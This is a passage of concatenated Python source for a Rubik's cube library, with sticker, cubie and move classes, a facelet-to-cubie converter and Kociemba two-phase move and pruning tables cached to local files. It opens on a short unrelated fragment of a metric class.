        truth = truth.cpu().numpy()
        return sk_metrics.f1_score(truth, preds)
    def select_better(self, old, new):
        return new if new > old else old
import random
from past.builtins import basestring
from copy import deepcopy
from .Move import Move
from .NaiveCube import NaiveCube
class Sticker(object):
    """One colored facelet. Compares (case-insensitively) against both
    strings and other Stickers."""
    COLOURS = ['w', 'r', 'b', 'g', 'y', 'o', '.']
    def __init__(self, color):
        if color.lower() not in self.COLOURS:
            raise ValueError("Color %s is not one of %s" %
                             (color, ', '.join(self.COLOURS)))
        self.color = color.lower()
    def __repr__(self):
        return self.color.upper()
    def __str__(self):
        return self.__repr__()
    def _comparison_key(self, o):
        # Normalize the other operand to an upper-case color string.
        if isinstance(o, basestring):
            return o.upper()
        elif isinstance(o, Sticker):
            return o.color.upper()
        else:
            raise TypeError("Don't know how to compare Sticker with %s" % o.__class__.__name__)
    def __lt__(self, o):
        return self.color.upper() < self._comparison_key(o)
    def __gt__(self, o):
        return self.color.upper() > self._comparison_key(o)
    def __le__(self, o):
        return (self < o) or (self == o)
    def __ge__(self, o):
        return (self > o) or (self == o)
    def __eq__(self, o):
        return self._comparison_key(o) == self.color.upper()
    def __ne__(self, o):
        return not(o == self)
class Cubie(object):
    """A cube piece: a mapping from facing letters to Stickers.

    FACINGS and COLORS are parallel strings, so index i of one maps to
    index i of the other (F->R, B->O, R->G, L->B, U->Y, D->W).
    """
    FACINGS = 'FBRLUD'
    COLORS = 'ROGBYW'
    def __init__(self, **kwargs):
        self.facings = {}
        for key, value in kwargs.items():
            key = key.upper()
            if key not in self.FACINGS:
                raise ValueError("Face %s is not one of %s" %
                                 (key, ', '.join(list(self.FACINGS))))
            self.facings[key] = Sticker(value)
    def __repr__(self):
        pairs = ['%s: %s' % (k, v) for k, v in self.facings.items()]
        return "<%s: %s>" % (self.__class__.__name__, ', '.join(pairs))
    @property
    def faces(self):
        return self.facings.keys()
    @property
    def colors(self):
        return self.facings.values()
    @staticmethod
    def facing_to_color(facing):
        return Cubie.COLORS[Cubie.FACINGS.index(facing.upper())]
    @staticmethod
    def color_to_facing(color):
        return Cubie.FACINGS[Cubie.COLORS.index(color.upper())]
    def color_facing(self, c):
        """Return the facing whose sticker matches color *c*, or None."""
        matches = (facing for facing, color in self.facings.items() if color == c)
        return next(matches, None)
class Center(Cubie):
    """A cubie with exactly one Sticker (the middle of a face)."""
    def __init__(self, **kwargs):
        if len(kwargs) == 1:
            super(Center, self).__init__(**kwargs)
        else:
            raise ValueError("Center must have only 1 Sticker")
class Edge(Cubie):
    """A cubie with exactly two Stickers."""
    def __init__(self, **kwargs):
        if len(kwargs) != 2:
            # BUG FIX: the message previously said "Center" (copy-paste).
            raise ValueError("Edge must have only 2 Stickers")
        super(Edge, self).__init__(**kwargs)
class Corner(Cubie):
    """A cubie with exactly three Stickers."""
    def __init__(self, **kwargs):
        if len(kwargs) != 3:
            # BUG FIX: the message previously said "Center" (copy-paste).
            raise ValueError("Corner must have only 3 Stickers")
        super(Corner, self).__init__(**kwargs)
class Cube(object):
    """A 3x3 cube modelled as a dict of named Cubies.

    Cubie names are sets of facing letters; they are normalized (sorted)
    through _t_key before being used as dict keys, so e.g. 'FLU' and 'LUF'
    address the same cubie.
    """
    CUBIES = [
        'FLU', 'FU', 'FRU', 'FL', 'F', 'FR', 'DFL', 'DF', 'DFR',
        'BLU', 'BU', 'BRU', 'BL', 'B', 'BR', 'BDL', 'BD', 'BDR',
        'LU', 'L', 'DL',
        'RU', 'R', 'DR',
        'D', 'U'
    ]
    # Facelet order of the NaiveCube string: one [cubie name, facing] entry
    # per sticker, read face by face.
    CUBE_MAP = [
        # UP
        ['BLU', 'U'], ['BU', 'U'], ['BRU', 'U'],
        ['UL', 'U' ], ['U', 'U' ], ['UR', 'U' ],
        ['FLU', 'U'], ['FU', 'U'], ['FRU', 'U'],
        # LEFT
        ['BLU', 'L'], ['UL', 'L'], ['FLU', 'L'],
        ['BL', 'L' ], ['L', 'L' ], ['FL', 'L' ],
        ['BLD', 'L'], ['DL', 'L'], ['FLD', 'L'],
        # FRONT
        ['FLU', 'F'], ['FU', 'F'], ['FRU', 'F'],
        ['FL', 'F' ], ['F', 'F' ], ['FR', 'F' ],
        ['FLD', 'F'], ['FD', 'F'], ['FRD', 'F'],
        # RIGHT
        ['FRU', 'R'], ['UR', 'R'], ['BRU', 'R'],
        ['FR', 'R' ], ['R', 'R' ], ['BR', 'R' ],
        ['FRD', 'R'], ['DR', 'R'], ['BRD', 'R'],
        # BACK
        ['BRU', 'B'], ['BU', 'B'], ['BLU', 'B'],
        ['BR', 'B' ], ['B', 'B' ], ['BL', 'B' ],
        ['BRD', 'B'], ['BD', 'B'], ['BLD', 'B'],
        # DOWN
        ['FLD', 'D'], ['FD', 'D'], ['FRD', 'D'],
        ['DL', 'D' ], ['D', 'D' ], ['DR', 'D' ],
        ['BLD', 'D'], ['BD', 'D'], ['BRD', 'D'],
    ]
    # For each move, the (origin, destination) cubie cycles applied by a
    # clockwise turn; the letter order within each name encodes how the
    # stickers map between facings. X/Y/Z/M/E/S are filled in below the
    # class body because they are composed from these face moves.
    MOVES = {
        'F': [
            ('FLU', 'FUR'),
            ('FUR', 'FRD'),
            ('FRD', 'FDL'),
            ('FDL', 'FLU'),
            ('FU', 'FR'),
            ('FR', 'FD'),
            ('FD', 'FL'),
            ('FL', 'FU'),
        ],
        'B': [
            ('BLU', 'BDL'),
            ('BDL', 'BRD'),
            ('BRD', 'BUR'),
            ('BUR', 'BLU'),
            ('BU', 'BL'),
            ('BL', 'BD'),
            ('BD', 'BR'),
            ('BR', 'BU'),
        ],
        'R': [
            ('RFU', 'RUB'),
            ('RUB', 'RBD'),
            ('RBD', 'RDF'),
            ('RDF', 'RFU'),
            ('RU', 'RB'),
            ('RB', 'RD'),
            ('RD', 'RF'),
            ('RF', 'RU'),
        ],
        'L': [
            ('LFU', 'LDF'),
            ('LDF', 'LBD'),
            ('LBD', 'LUB'),
            ('LUB', 'LFU'),
            ('LU', 'LF'),
            ('LF', 'LD'),
            ('LD', 'LB'),
            ('LB', 'LU'),
        ],
        'U': [
            ('ULB', 'UBR'),
            ('UBR', 'URF'),
            ('URF', 'UFL'),
            ('UFL', 'ULB'),
            ('UB', 'UR'),
            ('UR', 'UF'),
            ('UF', 'UL'),
            ('UL', 'UB'),
        ],
        'D': [
            ('DFL', 'DRF'),
            ('DRF', 'DBR'),
            ('DBR', 'DLB'),
            ('DLB', 'DFL'),
            ('DF', 'DR'),
            ('DR', 'DB'),
            ('DB', 'DL'),
            ('DL', 'DF'),
        ],
        'X': [
        ],
        'Y': [
        ],
        'Z': [
        ],
        'M': [
        ],
        'E': [
        ],
        'S': [
        ]
    }
    def __init__(self, size=3):
        self.__reset_cube()
        # It currently has no sense
        self.size = size
    def __reset_cube(self):
        """Rebuild every cubie in the solved position."""
        self.cubies = {}
        for cubie in self.CUBIES:
            # Sorting the key allows to access the dict in an unified manner
            cubie = self._t_key(cubie)
            if len(cubie) == 3:
                self.cubies[cubie] = Corner(
                    **dict([(face, Cubie.facing_to_color(face)) for face in cubie]))
            elif len(cubie) == 2:
                self.cubies[cubie] = Edge(
                    **dict([(face, Cubie.facing_to_color(face)) for face in cubie]))
            else:
                self.cubies[cubie] = Center(
                    **dict([(face, Cubie.facing_to_color(face)) for face in cubie]))
    @staticmethod
    def _t_key(key):
        """Normalize a cubie name to its canonical (sorted) dict key."""
        return ''.join(sorted(key))
    def from_naive_cube(self, cube):
        """Load sticker colors from a NaiveCube's 54-character configuration.

        Also normalizes the shared CUBE_MAP keys in place (idempotent,
        since _t_key of a sorted key is itself).
        """
        for i, color in enumerate(cube.get_cube()):
            cube_map = self.CUBE_MAP[i]
            cube_map[0] = self._t_key(cube_map[0])
            self.cubies[cube_map[0]].facings[cube_map[1]] = Sticker(color)
    def to_naive_cube(self):
        """Export this cube's stickers as a NaiveCube."""
        configuration = ''
        for cubie, face in self.CUBE_MAP:
            cubie = self._t_key(cubie)
            configuration += self.cubies[cubie].facings[face].color
        nc = NaiveCube(self.size)
        nc.set_cube(configuration)
        return nc
    @staticmethod
    def move_changes(move):
        """Return the (origin, destination) cycles for a Move, reversed for
        counterclockwise turns."""
        if not isinstance(move, Move):
            raise ValueError("Move must be an instance of Move")
        changes = Cube.MOVES[move.face]
        if move.counterclockwise:
            changes = [(c1, c0) for c0, c1 in changes]
        return changes
    def move(self, move):
        """Apply a Move to the cube, relocating stickers along the cycles."""
        changes = Cube.move_changes(move)
        # Snapshot destination cubies before they're overwritten, so cycles
        # that revisit a position still read the pre-move stickers.
        original_cubies = {}
        for c_origin, c_dest in changes:
            c_t_origin = self._t_key(c_origin)
            origin_cubie = original_cubies[c_t_origin] if c_t_origin in original_cubies else self.cubies[c_t_origin]
            dest_cubie = self.cubies[self._t_key(c_dest)]
            original_cubies[self._t_key(c_dest)] = deepcopy(dest_cubie)
            # Letter positions pair up origin facings with destination facings.
            for i, origin_facing in enumerate(c_origin):
                dest_facing = c_dest[i]
                dest_cubie.facings[dest_facing] = origin_cubie.facings[origin_facing]
        if move.double:
            # A double turn is two single turns.
            self.move(Move(move.face))
    def shuffle(self, seed=None):
        """Reset to solved, then apply 100-150 random face moves.

        Returns the applied Move sequence. Note random.choice(" 2'") can
        yield a trailing space (e.g. "F "), which Move's unanchored regex
        accepts.
        """
        self.__reset_cube()
        random.seed(seed)
        sequence = []
        for _ in range(random.randint(100, 150)):
            m = Move(random.choice(Cubie.FACINGS) + random.choice(" 2'"))
            sequence.append(m)
            self.move(m)
        return sequence
    def search_by_colors(self, *args):
        """Return the key of the cubie whose sticker colors match *args*
        (order-insensitive, case-insensitive), or None."""
        args = tuple(sorted(set(map(str.upper, map(str, args)))))
        for key, cubie in self.cubies.items():
            cubie_colors = tuple(sorted([str(c).upper() for c in cubie.facings.values()]))
            if args == cubie_colors:
                return key
        return None
# Middle slice (between L and R), turned in the L direction.
Cube.MOVES['M'].extend([
    ('UB', 'FU'),
    ('BD', 'UB'),
    ('DF', 'BD'),
    ('FU', 'DF'),
    ('U', 'F'),
    ('B', 'U'),
    ('D', 'B'),
    ('F', 'D'),
])
# Equatorial slice (between U and D), turned in the D direction.
Cube.MOVES['E'].extend([
    ('LF', 'FR'),
    ('BL', 'LF'),
    ('RB', 'BL'),
    ('FR', 'RB'),
    ('L', 'F'),
    ('B', 'L'),
    ('R', 'B'),
    ('F', 'R'),
])
# Standing slice (between F and B), turned in the F direction.
Cube.MOVES['S'].extend([
    ('UL', 'RU'),
    ('RU', 'DR'),
    ('DR', 'LD'),
    ('LD', 'UL'),
    ('U', 'R'),
    ('R', 'D'),
    ('D', 'L'),
    ('L', 'U'),
])
# Build Cube Axis MOVES
Cube.MOVES['X'].extend(Cube.move_changes(Move("R")))
Cube.MOVES['X'].extend(Cube.move_changes(Move("L'")))
Cube.MOVES['X'].extend(Cube.move_changes(Move("M'")))
Cube.MOVES['Y'].extend(Cube.move_changes(Move("U")))
Cube.MOVES['Y'].extend(Cube.move_changes(Move("D'")))
Cube.MOVES['Y'].extend(Cube.move_changes(Move("E'")))
Cube.MOVES['Z'].extend(Cube.move_changes(Move("F")))
Cube.MOVES['Z'].extend(Cube.move_changes(Move("B'")))
Cube.MOVES['Z'].extend(Cube.move_changes(Move("S")))
from past.builtins import basestring
import re
class Move(object):
    """One turn in standard notation: a face/slice/axis letter, optionally
    followed by ' (counterclockwise) or 2 (double turn)."""
    def __init__(self, move):
        # NOTE: re.match only anchors at the start, so trailing characters
        # (e.g. "F " produced by Cubie.Cube.shuffle) are tolerated and kept
        # in `raw`.
        if not re.match("[fblrudxyzmse]'?2?", move, re.I):
            raise ValueError("Invalid move format, must be [face]' or [face]2, got %s" % move)
        self.raw = move.upper()
    @property
    def face(self):
        # The face is always the first character of the raw notation.
        return self.raw[0].upper()
    @face.setter
    def face(self, new_face):
        self.raw = new_face + self.raw[1:]
    @property
    def double(self):
        return '2' in self.raw
    @double.setter
    def double(self, new_double):
        # Strip any existing modifier, then append '2' when enabling.
        if new_double:
            self.raw = self.raw.replace('2', '').replace("'", '') + '2'
        else:
            self.raw = self.raw.replace('2', '').replace("'", '')
    @property
    def counterclockwise(self):
        return "'" in self.raw
    @counterclockwise.setter
    def counterclockwise(self, value):
        if value:
            self.raw = self.raw.replace("'", '').replace("2", '') + "'"
        else:
            self.raw = self.raw.replace("'", '').replace("2", '')
    @property
    def clockwise(self):
        # A plain single turn: neither counterclockwise nor double.
        return not self.counterclockwise and not self.double
    @clockwise.setter
    def clockwise(self, value):
        self.counterclockwise = not value
    def reverse(self):
        """Return the Move that undoes this one (a double turn is its own inverse)."""
        return Move(self.face + ("'" if self.clockwise else "2" if self.double else ""))
    def __eq__(self, move):
        if isinstance(move, (str, basestring)):
            return self.raw == move.upper()
        elif isinstance(move, Move):
            return self.raw == move.raw
        else:
            return False
    def __str__(self):
        return self.raw
    def __repr__(self):
        return str(self)
    def __ne__(self, move):
        return not self == move
    def __add__(self, move):
        """Combine two turns of the same face; returns None when they cancel.

        Each modifier maps to a quarter-turn count (cw=1, double=2, ccw=3);
        the counts are summed mod 4 and mapped back through the lookup list.
        """
        if isinstance(move, (str, basestring)):
            return self + Move(move)
        elif move is None:
            return self
        elif isinstance(move, Move):
            if self.face != move.face:
                raise ValueError("Only same faces can be added")
            # Fast paths; both also fall out of the offset==0 check below
            # (1+3 = 2+2 = 0 mod 4).
            if self.clockwise and move.counterclockwise:
                return None
            if self.double and move.double:
                return None
            offset = (
                (self.clockwise + (self.double * 2) + (self.counterclockwise * 3)) +
                (move.clockwise + (move.double * 2) + (move.counterclockwise * 3))
            ) % 4
            if offset == 0:
                return None
            return Move(self.face + [None, "", "2", "'"][offset])
        else:
            raise ValueError("Unable to add %s and %s" %(self.raw, str(move)))
    def __mul__(self, times):
        """Repeat this Move `times` times; returns None when it cancels out."""
        offset = ((self.clockwise + (self.double * 2) + (self.counterclockwise * 3)) * times % 4)
        if offset == 0:
            return None
        return Move(self.face + [None, "", "2", "'"][offset])
from .Enums import Facelet, Color, Edge, Corner
from .CubieCube import CubieCube
class FaceCube(object):
    '''Cube on the facelet level
    Map the corner positions to facelet positions. cornerFacelet[URF.ordinal()][0] e.g. gives the position of the
    facelet in the URF corner position, which defines the orientation.<br>
    cornerFacelet[URF.ordinal()][1] and cornerFacelet[URF.ordinal()][2] give the position of the other two facelets
    '''
    cornerFacelet = [
        [Facelet.U9, Facelet.R1, Facelet.F3],
        [Facelet.U7, Facelet.F1, Facelet.L3],
        [Facelet.U1, Facelet.L1, Facelet.B3],
        [Facelet.U3, Facelet.B1, Facelet.R3],
        [Facelet.D3, Facelet.F9, Facelet.R7],
        [Facelet.D1, Facelet.L9, Facelet.F7],
        [Facelet.D7, Facelet.B9, Facelet.L7],
        [Facelet.D9, Facelet.R9, Facelet.B7]
    ]
    '''Map the edge positions to facelet positions. edgeFacelet[UR.ordinal()][0] e.g. gives the position of the facelet in
    the UR edge position, which defines the orientation.<br>
    edgeFacelet[UR.ordinal()][1] gives the position of the other facelet
    '''
    edgeFacelet = [
        [Facelet.U6, Facelet.R2],
        [Facelet.U8, Facelet.F2],
        [Facelet.U4, Facelet.L2],
        [Facelet.U2, Facelet.B2],
        [Facelet.D6, Facelet.R8],
        [Facelet.D2, Facelet.F8],
        [Facelet.D4, Facelet.L8],
        [Facelet.D8, Facelet.B8],
        [Facelet.F6, Facelet.R4],
        [Facelet.F4, Facelet.L6],
        [Facelet.B6, Facelet.L4],
        [Facelet.B4, Facelet.R6]
    ]
    '''Map the corner positions to facelet colors.'''
    cornerColor = [
        [Color.U, Color.R, Color.F],
        [Color.U, Color.F, Color.L],
        [Color.U, Color.L, Color.B],
        [Color.U, Color.B, Color.R],
        [Color.D, Color.F, Color.R],
        [Color.D, Color.L, Color.F],
        [Color.D, Color.B, Color.L],
        [Color.D, Color.R, Color.B]
    ]
    '''Map the edge positions to facelet colors.'''
    edgeColor = [
        [Color.U, Color.R],
        [Color.U, Color.F],
        [Color.U, Color.L],
        [Color.U, Color.B],
        [Color.D, Color.R],
        [Color.D, Color.F],
        [Color.D, Color.L],
        [Color.D, Color.B],
        [Color.F, Color.R],
        [Color.F, Color.L],
        [Color.B, Color.L],
        [Color.B, Color.R]
    ]
    def __init__(self, cubeString = "UUUUUUUUURRRRRRRRRFFFFFFFFFDDDDDDDDDLLLLLLLLLBBBBBBBBB"):
        '''Build a facelet cube from a 54-character string, one letter per
        facelet in the fixed U/R/F/D/L/B face order (default: solved cube).'''
        # Each character is resolved to its Color enum value by name.
        self.f = [0] * 54
        for i in range(54):
            self.f[i] = getattr(Color, cubeString[i])
    def to_String(self):
        '''Gives string representation of a facelet cube'''
        s = ""
        for i in range(54):
            s += Color.reverse_mapping[self.f[i]]
        return s
    def toCubieCube(self):
        '''Gives CubieCube representation of a faceletcube'''
        ccRet = CubieCube()
        for i in range(8):
            ccRet.cp[i] = Corner.URF  # invalidate corners
        for i in range(12):
            ccRet.ep[i] = Edge.UR  # and edges
        for i in Corner.reverse_mapping.keys():
            # get the colors of the cubie at corner i, starting with U/D
            # NOTE: the for/else mirrors a Java counting loop -- if no U/D
            # facelet is found, ori ends up as 3 (an invalid orientation).
            for ori in range(3):
                if (self.f[FaceCube.cornerFacelet[i][ori]] == Color.U) or (self.f[FaceCube.cornerFacelet[i][ori]] == Color.D):
                    break
            else:
                ori = 3
            col1 = self.f[FaceCube.cornerFacelet[i][(ori + 1) % 3]]
            col2 = self.f[FaceCube.cornerFacelet[i][(ori + 2) % 3]]
            for j in Corner.reverse_mapping.keys():
                # Match the two non-U/D sticker colors against the reference
                # corner color table to identify which corner cubie this is.
                if (col1 == FaceCube.cornerColor[j][1]) and (col2 == FaceCube.cornerColor[j][2]):
                    ccRet.cp[i] = j
                    ccRet.co[i] = ori % 3
                    break
        for i in Edge.reverse_mapping.keys():
            for j in Edge.reverse_mapping.keys():
                # An edge matches either in its reference orientation (flip 0)
                # or with both stickers swapped (flip 1).
                if (self.f[FaceCube.edgeFacelet[i][0]] == FaceCube.edgeColor[j][0]) and (self.f[FaceCube.edgeFacelet[i][1]] == FaceCube.edgeColor[j][1]):
                    ccRet.ep[i] = j
                    ccRet.eo[i] = 0
                if (self.f[FaceCube.edgeFacelet[i][0]] == FaceCube.edgeColor[j][1]) and (self.f[FaceCube.edgeFacelet[i][1]] == FaceCube.edgeColor[j][0]):
                    ccRet.ep[i] = j
                    ccRet.eo[i] = 1
                    break
        return ccRet
import os
from ..CubieCube import CubieCube
class CoordCube(object):
    '''Representation of the cube on the coordinate level
    (Kociemba two-phase solver). Each instance mirrors a CubieCube as a
    tuple of integer coordinates; the static *_Move tables (attached at
    module import time) give the new coordinate after each face turn.'''
    N_TWIST = 2187 # 3^7 possible corner orientations
    N_FLIP = 2048 # 2^11 possible edge flips
    N_SLICE1 = 495 # 12 choose 4 possible positions of FR,FL,BL,BR edges
    N_SLICE2 = 24 # 4! permutations of FR,FL,BL,BR edges in phase2
    N_PARITY = 2 # 2 possible corner parities
    N_URFtoDLF = 20160 # 8!/(8-6)! permutation of URF,UFL,ULB,UBR,DFR,DLF corners
    N_FRtoBR = 11880 # 12!/(12-4)! permutation of FR,FL,BL,BR edges
    N_URtoUL = 1320 # 12!/(12-3)! permutation of UR,UF,UL edges
    N_UBtoDF = 1320 # 12!/(12-3)! permutation of UB,DR,DF edges
    N_URtoDF = 20160 # 8!/(8-6)! permutation of UR,UF,UL,UB,DR,DF edges in phase2
    N_URFtoDLB = 40320 # 8! permutations of the corners
    N_URtoBR = 479001600 # 12! permutations of the edges (UR..BR)
    N_MOVE = 18
    # twistMove = [[0 for _ in range(N_MOVE)] for _ in range( N_TWIST )] ## careful: rows must be distinct lists (no shared references)
    # flipMove = [[0 for _ in range(N_MOVE)] for _ in range( N_FLIP )]
    # FRtoBR_Move = [[0 for _ in range(N_MOVE)] for _ in range( N_FRtoBR )]
    # URFtoDLF_Move = [[0 for _ in range(N_MOVE)] for _ in range( N_URFtoDLF )]
    # URtoDF_Move = [[0 for _ in range(N_MOVE)] for _ in range( N_URtoDF )]
    # URtoUL_Move = [[0 for _ in range(N_MOVE)] for _ in range( N_URtoUL )]
    # UBtoDF_Move = [[0 for _ in range(N_MOVE)] for _ in range( N_UBtoDF )]
    # MergeURtoULandUBtoDF = [[0 for _ in range(336)] for _ in range( 336 )]
    # Slice_URFtoDLF_Parity_Prun = [-1] * (N_SLICE2 * N_URFtoDLF * N_PARITY // 2)
    # Slice_URtoDF_Parity_Prun = [-1] * (N_SLICE2 * N_URtoDF * N_PARITY // 2)
    # Slice_Twist_Prun = [-1] * (N_SLICE1 * N_TWIST // 2 + 1)
    # Slice_Flip_Prun = [-1] * (N_SLICE1 * N_FLIP // 2)
    ## Parity of the corner permutation. This is the same as the parity for the edge permutation of a valid cube.
    ## parity has values 0 and 1
    parityMove = [
        [1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1],
        [0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0]
    ]
    @staticmethod
    def setPruning(table, index, value):
        '''Store a 4-bit pruning value at `index` in a nibble-packed table.
        Uses &=, so it only works while the target nibble still holds 0xf
        (tables are initialised to -1, i.e. all bits set).'''
        if (index & 1) == 0:
            table[index // 2] &= (0xf0 | value)
        else:
            table[index // 2] &= (0x0f | (value << 4))
    @staticmethod
    def getPruning(table, index):
        '''Read the 4-bit pruning value at `index` from a nibble-packed table.'''
        if (index & 1) == 0:
            return table[index // 2] & 0x0f
        else:
            return (table[index // 2] & 0xf0) >> 4
    def __init__(self, c):
        ''' c is a CubieCube instance'''
        if not isinstance(c, CubieCube):
            raise ValueError('c must be a CubieCube instance, got %s' % c.__class__.__name__)
        # Project the cubie-level cube onto all coordinates used by the
        # two-phase algorithm.
        self.twist = c.getTwist()
        self.flip = c.getFlip()
        self.parity = c.cornerParity()
        self.FRtoBR = c.getFRtoBR()
        self.URFtoDLF = c.getURFtoDLF()
        self.URtoUL = c.getURtoUL()
        self.UBtoDF = c.getUBtoDF()
        self.URtoDF = c.getURtoDF() # only needed in phase2
    def move(self, m):
        '''A move on the coordinate level
        m is a move index (0..17); every coordinate is updated via its
        precomputed move table.'''
        self.twist = self.twistMove[self.twist][m]
        self.flip = self.flipMove[self.flip][m]
        self.parity = self.parityMove[self.parity][m]
        self.FRtoBR = self.FRtoBR_Move[self.FRtoBR][m]
        self.URFtoDLF = self.URFtoDLF_Move[self.URFtoDLF][m]
        self.URtoUL = self.URtoUL_Move[self.URtoUL][m]
        self.UBtoDF = self.UBtoDF_Move[self.UBtoDF][m]
        if self.URtoUL < 336 and self.UBtoDF < 336: # updated only if UR,UF,UL,UB,DR,DF
            # are not in UD-slice
            self.URtoDF = self.MergeURtoULandUBtoDF[self.URtoUL][self.UBtoDF]
## Init more static values of class CubieCube
def read_or_func_list(file_name, func):
    """Load a cached list of ints from `file_name` (stored next to this
    module), or build it with `func()` and persist it as comma-separated
    values. Returns the list of ints either way.
    """
    abspath = os.path.join(os.path.dirname(os.path.abspath(__file__)), file_name)
    if os.path.exists(abspath):
        # Context managers close the handles deterministically (the original
        # left both the read and write handles open until GC).
        with open(abspath) as cache_file:
            return [int(token.strip()) for token in cache_file.read().split(',')]
    ret = func()
    with open(abspath, 'w') as cache_file:
        cache_file.write(','.join(str(c) for c in ret))
    return ret
def read_or_func_matrix(file_name, func):
    """Load a cached matrix of ints (one CSV row per line) from `file_name`
    (stored next to this module), or build it with `func()` and persist it.
    Returns the matrix (list of lists of ints) either way.
    """
    abspath = os.path.join(os.path.dirname(os.path.abspath(__file__)), file_name)
    if os.path.exists(abspath):
        # Context managers close the handles deterministically (the original
        # left both the read and write handles open until GC).
        with open(abspath) as cache_file:
            return [[int(token.strip()) for token in line.split(',')] for line in cache_file]
    ret = func()
    with open(abspath, 'w') as cache_file:
        cache_file.write('\n'.join(','.join(str(c) for c in row) for row in ret))
    return ret
def build_twist_move():
    """Tabulate the new twist coordinate for every (twist, face turn) pair."""
    table = [[0] * CoordCube.N_MOVE for _ in range(CoordCube.N_TWIST)]
    cube = CubieCube()
    for twist in range(CoordCube.N_TWIST):
        cube.setTwist(twist)
        for face in range(6):
            for power in range(3):
                cube.cornerMultiply(CubieCube.moveCube[face])
                table[twist][3 * face + power] = cube.getTwist()
            cube.cornerMultiply(CubieCube.moveCube[face])  # 4th turn restores the cube
    return table
def build_flip_move():
    """Tabulate the new flip coordinate for every (flip, face turn) pair."""
    table = [[0] * CoordCube.N_MOVE for _ in range(CoordCube.N_FLIP)]
    cube = CubieCube()
    for flip in range(CoordCube.N_FLIP):
        cube.setFlip(flip)
        for face in range(6):
            for power in range(3):
                cube.edgeMultiply(CubieCube.moveCube[face])
                table[flip][3 * face + power] = cube.getFlip()
            cube.edgeMultiply(CubieCube.moveCube[face])  # 4th turn restores the cube
    return table
def build_urf_to_dlf():
    """Tabulate the new URFtoDLF coordinate for every (coord, face turn) pair."""
    table = [[0] * CoordCube.N_MOVE for _ in range(CoordCube.N_URFtoDLF)]
    cube = CubieCube()
    for coord in range(CoordCube.N_URFtoDLF):
        cube.setURFtoDLF(coord)
        for face in range(6):
            for power in range(3):
                cube.cornerMultiply(CubieCube.moveCube[face])
                table[coord][3 * face + power] = cube.getURFtoDLF()
            cube.cornerMultiply(CubieCube.moveCube[face])  # 4th turn restores the cube
    return table
def build_fr_to_br():
    """Tabulate the new FRtoBR coordinate for every (coord, face turn) pair."""
    table = [[0] * CoordCube.N_MOVE for _ in range(CoordCube.N_FRtoBR)]
    cube = CubieCube()
    for coord in range(CoordCube.N_FRtoBR):
        cube.setFRtoBR(coord)
        for face in range(6):
            for power in range(3):
                cube.edgeMultiply(CubieCube.moveCube[face])
                table[coord][3 * face + power] = cube.getFRtoBR()
            cube.edgeMultiply(CubieCube.moveCube[face])  # 4th turn restores the cube
    return table
def build_ur_to_df():
    """Tabulate the new URtoDF coordinate for every (coord, face turn) pair."""
    table = [[0] * CoordCube.N_MOVE for _ in range(CoordCube.N_URtoDF)]
    cube = CubieCube()
    for coord in range(CoordCube.N_URtoDF):
        cube.setURtoDF(coord)
        for face in range(6):
            for power in range(3):
                cube.edgeMultiply(CubieCube.moveCube[face])
                table[coord][3 * face + power] = cube.getURtoDF()
            cube.edgeMultiply(CubieCube.moveCube[face])  # 4th turn restores the cube
    return table
def build_ur_to_ul():
    """Tabulate the new URtoUL coordinate for every (coord, face turn) pair."""
    table = [[0] * CoordCube.N_MOVE for _ in range(CoordCube.N_URtoUL)]
    cube = CubieCube()
    for coord in range(CoordCube.N_URtoUL):
        cube.setURtoUL(coord)
        for face in range(6):
            for power in range(3):
                cube.edgeMultiply(CubieCube.moveCube[face])
                table[coord][3 * face + power] = cube.getURtoUL()
            cube.edgeMultiply(CubieCube.moveCube[face])  # 4th turn restores the cube
    return table
def build_ub_to_df():
    """Tabulate the new UBtoDF coordinate for every (coord, face turn) pair."""
    ub_to_df = [[0 for _ in range(CoordCube.N_MOVE)] for _ in range( CoordCube.N_UBtoDF )]
    a = CubieCube()
    # BUG FIX: the original iterated range(CoordCube.N_URtoUL) here. The two
    # constants happen to share the value 1320, so behavior was unchanged,
    # but this table is the UBtoDF one and must use the matching constant.
    for i in range(CoordCube.N_UBtoDF):
        a.setUBtoDF(i)
        for j in range(6):
            for k in range(3):
                a.edgeMultiply(CubieCube.moveCube[j])
                ub_to_df[i][ 3 * j + k ] = a.getUBtoDF()
            a.edgeMultiply(CubieCube.moveCube[j])  # 4th turn restores the cube
    return ub_to_df
def build_merge_ur_to_ul_and_ub_to_df():
    """Tabulate the merged URtoDF coordinate for each (URtoUL, UBtoDF) pair
    (both restricted to < 336, i.e. the phase-2 domain)."""
    return [
        [CubieCube.getURtoDFs(ur_to_ul, ub_to_df) for ub_to_df in range(336)]
        for ur_to_ul in range(336)
    ]
def build_slice_urf_to_dlf_parity_prun():
    """Breadth-first fill of the phase-2 pruning table over the combined
    (slice, URFtoDLF, parity) coordinate. Values are BFS depths packed two
    per byte (see CoordCube.setPruning); -1 entries mean 'not yet reached'.
    """
    slice_urf_to_dlf_parity_prun = [-1] * (CoordCube.N_SLICE2 * CoordCube.N_URFtoDLF * CoordCube.N_PARITY // 2)
    CoordCube.setPruning(slice_urf_to_dlf_parity_prun, 0, 0)  # solved state at depth 0
    done, depth = 1, 0
    # Expand one BFS frontier (all states at `depth`) per outer iteration.
    while done < CoordCube.N_SLICE2 * CoordCube.N_URFtoDLF * CoordCube.N_PARITY:
        for i in range(CoordCube.N_SLICE2 * CoordCube.N_URFtoDLF * CoordCube.N_PARITY):
            # Unpack the flat index: lowest bit is parity, the rest splits
            # into the URFtoDLF and slice sub-coordinates.
            parity = i % 2
            URFtoDLF = (i // 2) // CoordCube.N_SLICE2
            slicing = (i // 2) % CoordCube.N_SLICE2
            if CoordCube.getPruning(slice_urf_to_dlf_parity_prun, i) == depth:
                # Phase-2 move subset: U,U2,U',R2,F2,D,D2,D',L2,B2.
                for j in [0, 1, 2, 4, 7, 9, 10, 11, 13, 16]:
                    newSlice = CoordCube.FRtoBR_Move[slicing][j]
                    newURFtoDLF = CoordCube.URFtoDLF_Move[URFtoDLF][j]
                    newParity = CoordCube.parityMove[parity][j]
                    # 0x0f marks an untouched nibble (table initialised to -1).
                    if CoordCube.getPruning(slice_urf_to_dlf_parity_prun, ((CoordCube.N_SLICE2 * newURFtoDLF) + newSlice) * 2 + newParity) == 0x0f:
                        CoordCube.setPruning(slice_urf_to_dlf_parity_prun, ((CoordCube.N_SLICE2 * newURFtoDLF) + newSlice) * 2 + newParity, depth + 1)
                        done += 1
        depth += 1
    return slice_urf_to_dlf_parity_prun
